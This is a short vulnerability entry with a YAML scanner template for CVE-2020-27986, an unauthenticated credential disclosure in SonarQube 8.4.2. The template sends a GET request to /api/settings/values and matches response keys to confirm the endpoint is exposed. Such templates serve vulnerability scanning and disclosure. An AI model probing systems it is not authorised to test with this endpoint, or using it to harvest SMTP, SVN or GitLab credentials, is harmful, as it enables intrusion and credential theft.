SonarQube 8.4.2.36762 allows remote attackers to discover cleartext SMTP, SVN, and GitLab credentials via the api/settings/values URI. NOTE: reportedly, the vendor's position for SMTP and SVN is "it is the administrator's responsibility to configure it.
PoC代码[已公开]
id: CVE-2020-27986
info:
name: SonarQube unauth
author: pa55w0rd
severity: high
description: |-
SonarQube 8.4.2.36762 allows remote attackers to discover cleartext SMTP, SVN, and GitLab credentials via the api/settings/values URI. NOTE: reportedly, the vendor's position for SMTP and SVN is "it is the administrator's responsibility to configure it.
reference:
- https://www.tenable.com/security/research/tra-2020-53
- https://nvd.nist.gov/vuln/detail/CVE-2020-27986
tags: cve,cve2020,sonarqube,disclosure
created: 2023/06/23
rules:
r0:
request:
method: GET
path: /api/settings/values
expression: response.status == 200 && response.content_type.contains("application/json") && response.body.bcontains(b"sonaranalyzer-cs.nuget.packageVersion") && response.body.bcontains(b"sonar.core.id")
expression: r0()